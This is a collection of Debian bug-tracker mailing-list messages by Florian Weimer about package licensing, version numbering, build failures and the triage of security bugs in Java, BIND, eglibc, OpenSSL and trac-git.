| As a consequence, further Oracle JDK 6 (or Oracle JDK 7) releases on
| Linux and Solaris will not be provided under the DLJ. They will
| continue to be provided under the familiar Oracle JDK license, the
| BCL.

http://robilad.livejournal.com/90792.html

I'm not sure if the standard JDK license agreement is sufficient.



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#641950: secuity of Crypt::RC4

[Florian Weimer]

* Nicholas Bamber:

 Please could have someone have a look at #641950? This module was
 packaged as it has been flagged up as a dependency of a new version of
 an existing package. However based upon the comments in the bug report
 it really is something we do not wish to encourage.
 In any case the CPAN module seems to be dead upstream. Should we simply
 adjust the description (and if so what tone should be taken) or should
 the package be removed?

RC4 is used by protocols we might want to implement, so we need the
code.  As far as I understand it, there are relatively safe ways to
use the cipher, even though it is severely broken.



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#639916: spread: license wackiness

[Florian Weimer]

* Ken Arromdee:

 Unlike the original BSD 4 clause license this adds or software that uses
 this software.

Is it really that much different in effect from the Affero GPL?  It
may be a bit more far-reaching, but compliance is so much easier.



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#640093: Incorrect version number prevents automatic upgrades

[Florian Weimer]

Package: opensync
Version: 0.22-4squeeze1
Severity: serious

At one point, a binary NMU produced a 0.22-4+b1 version, which is larger
than 0.22-4squeeze1.  Please reupload with a version number like
0.22-4+squeeze1.

(Setting severity to serious because #580867 was serious.)

-- 
Florian Weimerfwei...@bfk.de
BFK edv-consulting GmbH   http://www.bfk.de/
Kriegsstraße 100  tel: +49-721-96201-1
D-76133 Karlsruhe fax: +49-721-96201-99



--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#533934: pperl: FTBFS: tests failed directory

[Florian Weimer]

* Dominic Hargreaves:

 I added the quotation marks because I'm starting to doubt that it is
 worth spending time on. I use pperl a bit, but probably wouldn't miss
 it hugely, and upstream appears to be dead.

I don't use it anymore, either.

You could probably get away without hashing, by using something like
$basename.$device.$inode.$counter.  $counter is used to resolve
collisions.



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#629852: Oracle Java SE Critical Patch Update Advisory - June 2011

[Florian Weimer]

* Torsten Werner:

 Am 09.06.2011 02:07, schrieb Sylvestre Ledru:
 Le mercredi 08 juin 2011 à 23:08 +0200, Nico Golde a écrit :
 Package: openjdk-6-jre, sun-java6-jre
 Severity: serious
 Tags: security

 A new round of java issues:
 CVE-2011-0862 CVE-2011-0873 CVE-2011-0815 CVE-2011-0817 CVE-2011-0863 
 CVE-2011-0864 CVE-2011-0802
 CVE-2011-0814 CVE-2011-0871 CVE-2011-0786 CVE-2011-0788 CVE-2011-0866 
 CVE-2011-0868 CVE-2011-0872
 CVE-2011-0867 CVE-2011-0869 CVE-2011-0865
 I will take care of this bug tomorrow (thursday)

 Both openjdk-6 and sun-java6 or sun-java6 only?

Will anyone upload 1.8.8 to unstable soon?  I would like to release
1.8.8 to stable-security, and would have to mess with the version
number to keep it below the unstable/testing version.

I can NMU unstable as well, if that's okay.



--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#628476: Package does not seem to work at all

[Florian Weimer]

Package: python-wordaxe
Version: 0.3.2-1
Severity: grave

The documentation mentions importing wordaxe.DCWHyphenator.  But this
does not work:

fw@deneb:~$ python
Python 2.6.6 (r266:84292, Dec 26 2010, 22:31:48) 
[GCC 4.4.5] on linux2
Type help, copyright, credits or license for more information.
 import wordaxe.DCWHyphenator
/usr/lib/pymodules/python2.6/wordaxe/DCWHyphenator.py:12: DeprecationWarning: 
the sets module is deprecated
  import sets
Traceback (most recent call last):
  File stdin, line 1, in module
  File /usr/lib/pymodules/python2.6/wordaxe/DCWHyphenator.py, line 26, in 
module
import wordaxe.dict.DEhyph as DEhyph
ImportError: No module named dict.DEhyph
 




-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#622817: perl: CVE-2011-1487: taint laundering in lc, uc

[Florian Weimer]

* Niko Tyni:

 Security team, I assume this is going to be fixed through a DSA?

I don't think this is a security bug on its own.

 It should be trivial to port this to squeeze and lenny. I'll try to
 prepare the debdiffs on Sunday, but if somebody else wants to do that,
 feel free.

If this bug fixes any actual vulnerabilities, such a backport will
break applications, hard.  Therefore, I would prefer to let it soak in
unstable/testing for some time, to see what happens.



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#616114: man in the middle security issue

[Florian Weimer]

* Thijs Kinkhorst:

 The following report by PolarSSL upstream was brought to our attention:
 https://lists.ubuntu.com/archives/ubuntu-motu/2011-February/007026.html

 Unfortunately it doesn't disclose details. I'll contact the upstream
 maintainer about that, but in any case a good start would be to
 upload the new upstream to unstable. Are you able to do that?

There is now sufficiently detailed in formation at:

  http://polarssl.org/trac/wiki/SecurityAdvisory201101

Arnaud, could you please prepare fixed packages?



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#614151: icedtea6-plugin: (PRSC) Please backport fixes for CVE-2011-0025, 4351 to squeeze, lenny

[Florian Weimer]

* Jonathan Wiltshire:

 Package: icedtea6-plugin
 Version: 6b11-9.1
 Severity: grave
 Tags: squeeze lenny security
 Justification: user security hole
 Usertags: prsc-target-lenny, prsc-target-squeeze

 Please backport your fixes for the following CVE reports:

There is no icedtea6-plugin package in lenny (and quite deliberately
so).  There is icedtea-gcjwebplugin, which does not work at all AFAIK.
So I don't see there's anything to do for lenny, at least as far as
the openjdk-6 source package is concerned.



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#613098: Zero is unusable on amd64

[Florian Weimer]

Package: openjdk-6-jre-zero
Version: 6b18-1.8.3-2
Severity: grave

At least on amd64, all tests fail during build, and all non-trivial
programs fail.

Here's a stack trace from javac -zero compiling a trivial program:

java.nio.BufferOverflowException
at java.nio.charset.CoderResult.throwException(CoderResult.java:276)
at java.lang.StringCoding$StringEncoder.encode(StringCoding.java:260)
at java.lang.StringCoding.encode(StringCoding.java:290)
at java.lang.String.getBytes(String.java:954)
at java.io.UnixFileSystem.getBooleanAttributes0(Native Method)
at java.io.UnixFileSystem.getBooleanAttributes(UnixFileSystem.java:243)
at java.io.File.isFile(File.java:795)
at 
com.sun.tools.javac.util.JavacFileManager.listDirectory(JavacFileManager.java:336)
at 
com.sun.tools.javac.util.JavacFileManager.list(JavacFileManager.java:926)
at com.sun.tools.javac.jvm.ClassReader.fillIn(ClassReader.java:2137)
at com.sun.tools.javac.jvm.ClassReader.complete(ClassReader.java:1795)
at com.sun.tools.javac.code.Symbol.complete(Symbol.java:400)
at 
com.sun.tools.javac.code.Symbol$PackageSymbol.members(Symbol.java:625)
at com.sun.tools.javac.comp.MemberEnter.importAll(MemberEnter.java:133)
at 
com.sun.tools.javac.comp.MemberEnter.visitTopLevel(MemberEnter.java:521)
at 
com.sun.tools.javac.tree.JCTree$JCCompilationUnit.accept(JCTree.java:454)
at 
com.sun.tools.javac.comp.MemberEnter.memberEnter(MemberEnter.java:400)
at com.sun.tools.javac.comp.MemberEnter.complete(MemberEnter.java:831)
at com.sun.tools.javac.code.Symbol.complete(Symbol.java:400)
at com.sun.tools.javac.code.Symbol$ClassSymbol.complete(Symbol.java:777)
at com.sun.tools.javac.comp.Enter.complete(Enter.java:465)
at com.sun.tools.javac.comp.Enter.main(Enter.java:443)
at 
com.sun.tools.javac.main.JavaCompiler.enterTrees(JavaCompiler.java:836)
at com.sun.tools.javac.main.JavaCompiler.compile(JavaCompiler.java:741)
at com.sun.tools.javac.main.Main.compile(Main.java:380)
at com.sun.tools.javac.main.Main.compile(Main.java:306)
at com.sun.tools.javac.main.Main.compile(Main.java:297)
at com.sun.tools.javac.Main.compile(Main.java:82)
at com.sun.tools.javac.Main.main(Main.java:67)

Does the package work on any other Shark platform? (-Xint seems to
work.)




-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#607794: bind 9.6.ESV.R3 DLV and further delegation issue

[Florian Weimer]

severity 607794 important
forwarded 607794 bind-b...@isc.org
thanks

* Peter Palfrader:

 Peter Palfrader schrieb am Mittwoch, dem 19. Jänner 2011:

 severity 607794 serious
 thanks
 
 So, I managed to reproduce the problem which has come up a few times
 now.  Note that 9.7.2.dfsg.P3 is not affected, only 9.6.ESV.R3 in
 stable.


 | dig +dnssec @localhost -t ns www.debian.org

 I submitted www.d.o itself to the DLV to work around this bug.  You can
 still see the bug in action at delegation-test2.debian.org:

 dig +dnssec @localhost -t ns delegation-test2.debian.org

Thanks, I have reproduced this with stock 9.6-ESV-R3.

Installing the trust anchor for the root appears to be a workaround,
so I'm downgroading the severity.



--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#493599: pushing udns into squeeze

[Florian Weimer]

* Michael Tokarev:

 udns doesn't handle truncation, so it won't play well with the
 PowerDNS recursor (which doesn't support EDNS).

 One of the limitations of simplicity of design - only one
 socket and it's obviously UDP.  With deployment of DNSSEC
 everywhere EDNS support becomes a requiriment, because of
 the size of DNSSEC records, so this problem becomes less
 and less of an issue.  Yes I understand this is where
 udns does not conform to standards.



 The domain name parser triggers undefined behavior for certain inputs
 because it performs out-of-bound pointer arithmetic.  This is unlikely
 to cause practical problems with current GCC versions (but LTO might
 change this).

 And here goes my main question.

 http://www.corpit.ru/mjt/udns_dn.c is the code in question, the
 domain parser.  Florian, can you please tell me where do you think
 it performs such oob arith?

I think I was referring to loop exit conditions such as:

  while(--s = (dnscc_t *)addr) {

These are problematic if the compiler can prove that addr does not
point into an array of suitable struct ?_addr objects.



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#600667: eglibc: cve-2010-3847 dynamic linker expands $ORIGIN in setuid library search path

[Florian Weimer]

* Aurelien Jarno:

 I have just committed the fix, I am planning to do an upload soon to
 unstable. Do you think we should also fix it in stable? via a security
 release?

FYI, I have uploaded eglibc 2.11.2-6+squeeze1 to testing-security.



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#584911: bind9: hard-coded dependency on /usr/lib/ssl/openssl.cnf might cause trouble

[Florian Weimer]

reassign 584911 openssl 0.9.8g-15+lenny6
retitle 584911 unreadable /usr/lib/ssl/openssl.cnf file breaks OPENSSL_config
thanks

* Mirko Gebauer:

 BIND uses the NULL argument, as far as I can tell.  So this might be
 an OpenSSL bug.

 Well, all I can say is that bind9 as provided by the package version
 1:9.5.1.dfsg.P3-1+lenny1 doesn't show the reported behavior, and
 that both 1:9.5.1.dfsg.P3-1+lenny1 and the current
 1:9.6.ESV.R1+dfsg-0+lenny1 depend on the same version of
 libssl0.9.8.

This is a bug in OpenSSL, and it is impossible to work around in
bind9, unfortunately.  Here's the relevant exceprt from

ERR_clear_error();
if (CONF_modules_load_file(NULL, config_name,
CONF_MFLAGS_DEFAULT_SECTION|CONF_MFLAGS_IGNORE_MISSING_FILE) = 0)
{
BIO *bio_err;
ERR_load_crypto_strings();
if ((bio_err=BIO_new_fp(stderr, BIO_NOCLOSE)) != NULL)
{
BIO_printf(bio_err,Auto configuration failed\n);
ERR_print_errors(bio_err);
BIO_free(bio_err);
}
exit(1);
}

return;
}

The propblem is that it's not ignoring permission errors, in contrast
to what's promised in the manual page.  And there doesn't appear to be
a way to bypass that exit(1) call.

I guess the only viable fix is to keep /etc/ss/openssl.cnf
world-readable.



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#584911: bind9: hard-coded dependency on /usr/lib/ssl/openssl.cnf might cause trouble

[Florian Weimer]

* Mirko Gebauer:

 /usr/lib/ssl/openssl.cnf is a symlink to /etc/ssl/openssl.cnf,
 both provided by the package openssl. Unfortunately, on the
 respective machine, /etc/ssl/openssl.cnf is modified and not
 world-readable as it is by default after installing the openssl
 package.

Thanks for tracking this down.  I suspect that this is due to the
OPENSSL_config() call, but I need to check this in a debugger to be
sure.

However, OpenSSL's documentation says this:

   OPENSSL_config() configures OpenSSL using the standard
   openssl.cnf configuration file name using config_name. If
   config_name is NULL then the default name openssl_conf will be
   used. Any errors are ignored.

BIND uses the NULL argument, as far as I can tell.  So this might be
an OpenSSL bug.



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#584585: file conflict with libisc50

[Florian Weimer]

* Peter Palfrader:

 Unpacking libisc52 (from .../libisc52_1%3a9.6.ESV.R1+dfsg-0+lenny1_i386.deb) 
 ...
 dpkg: error processing 
 /var/cache/apt/archives/libisc52_1%3a9.6.ESV.R1+dfsg-0+le
 nny1_i386.deb (--unpack):
  trying to overwrite `/usr/lib/libisc.so.50', which is also in package 
 libisc50

Where does that come from?

f...@merkel:~$ dak ls libisc50
f...@merkel:~$ 

Stable has libisc40, and there are no conflicts with that TTBOMK.



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#584585: file conflict with libisc50

[Florian Weimer]

* Peter Palfrader:

 Stable has libisc40, and there are no conflicts with that TTBOMK.

 Ah.  Apparently from the libisc50 that was in unstable (and testing?)
 with bind 9.6 at one point and its backport to lenny-backports.

 Hmm.

I'm not sure what to do about this.  Upload a -0+lenny2 with a
Conflicts:?  Post a follow-up to debian-security saying that if you
have installed backports, you should remove obsolete packages first?



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#560238: Status, client-side breakage

[Florian Weimer]

What's the status here?

I think the client-side breakage of v4-mapped addresses reported by
Guillaume Gimenez in

http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=560238#129

pretty much settles this.



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#567039: trac-git: Arbitrary command execution

[Florian Weimer]

* Stefan Göbel:

 Package: trac-git
 Version: 0.0.20080710-3
 Severity: grave
 Tags: patch security
 Justification: user security hole


 The trac-git package in Debian Lenny - if enabled in Trac - allows a
 remote attacker to execute arbitrary commands on the system with the
 rights of the user running Trac. The attacker must have the rights to
 browse the repository in order to exploit this issue, other parts of
 Trac are most likely not affected.

Thanks.  I have assigned CVE-2010-0394 to this issue.



--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#506652: status on copyright clearance for boilerplate for xml2rfc?

[Florian Weimer]

* Florian Weimer:

 * Daniel Kahn Gillmor:

 What's the status on copyright clearance for the boilerplate included in
 xml2rfc?  It would be useful to me to have the latest version available
 through the repositories (even if it means moving it to non-free, though
 i hope that wouldn't be necessary).

 We can't move it to non-free because as far as I can tell, we lack the
 distribution rights for the TLP because the TLP grants distribution
 rights for IETF activities only, and Debian is not an IETF activity.

I misread the document.  non-free is definitely a possibility.



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#506652: status on copyright clearance for boilerplate for xml2rfc?

[Florian Weimer]

* Daniel Kahn Gillmor:

 What's the status on copyright clearance for the boilerplate included in
 xml2rfc?  It would be useful to me to have the latest version available
 through the repositories (even if it means moving it to non-free, though
 i hope that wouldn't be necessary).

We can't move it to non-free because as far as I can tell, we lack the
distribution rights for the TLP because the TLP grants distribution
rights for IETF activities only, and Debian is not an IETF activity.

I'm going to request additional permissions from the IETF trust.
Depending on the scope of those permissions, the package can remain in
main or will have to be moved to non-free.

I also plan to orphan the package because I don't use it myself and I
don't want to block anyone else from taking better care of it.



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#506652: status on copyright clearance for boilerplate for xml2rfc?

[Florian Weimer]

* Daniel Kahn Gillmor:

 On 12/02/2009 02:00 PM, Florian Weimer wrote:
 I misread the document.  non-free is definitely a possibility.

 If you think non-free is a reasonable choice for now, could you package
 up 1.34 and put it there while the request for DFSG-free licensing winds
 its way through whatever red tape it needs to?

I don't want to maintain packages in non-free.  But apart from that,
I think it's fine.

 i'd be up for taking over the package from you, but i'd want to know:

  * how are you currently maintaining it?  For example, there are git
 references in debian/rules, but no Vcs-Git-* in debian/control.

There's a repository below http://git.enyo.de/fw/debian/, but I
think I botched my local copy, and actually uploaded the current
version without comitting everything.  I might have fixed that now,
but there are no guarantees that the version in the Git repository is
actually the official one.  Sorry about that. 8-(

(If you clone from there, not that that the box only has got about
1Mbps of bandwidth to the Internet, so it's kind of slow.)

 And i could find no indication of rationales (or details) for the
 changes that were made to make the package DFSG-Free.  looks like
 contrib was removed, as were drafts of rfc2629bis.  What made you
 decide these were not redistributable?  some of them (xml2rfcpp.pl,
 for example) appear to be explicitly placed in the public domain,
 for whatever that's worth.

Some of the example RFCs are non-free under Debian's policy.  Some
parts of contrib were not DFSG-compliant, either, and if there were
parts that were free software, I simply missed them.

  * how are the requests for licensing changes being handled?  who are
 you currently in conversation with?  where do those conversations stand?
  can i help out?

I asked on the tlp-interest list first, but that didn't lead to action
from the IETF, as far as I can tell.  I'm now following the official
procedure, as outlined in the TLP document.

 I'd like to have the latest version available so it's easy for debian
 folks to participate in the IETF process.  I'd also like to include
 idnits in the archive for the same reason, though it contains some
 boilerplate itself that i'm unclear on the licensing for.  perhaps it
 should just go in non-free as well.  ugh.

Yes, non-free seems to be the easiest option.

Other possible improvements for the packge: xml2rfc phones home, this
should be patched out.  The XSLT file could be integrated into
Debian's XML toolchain, I think, but I'm not sure how to do this (I
had some trouble integrating the DTD, but it should work now).



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org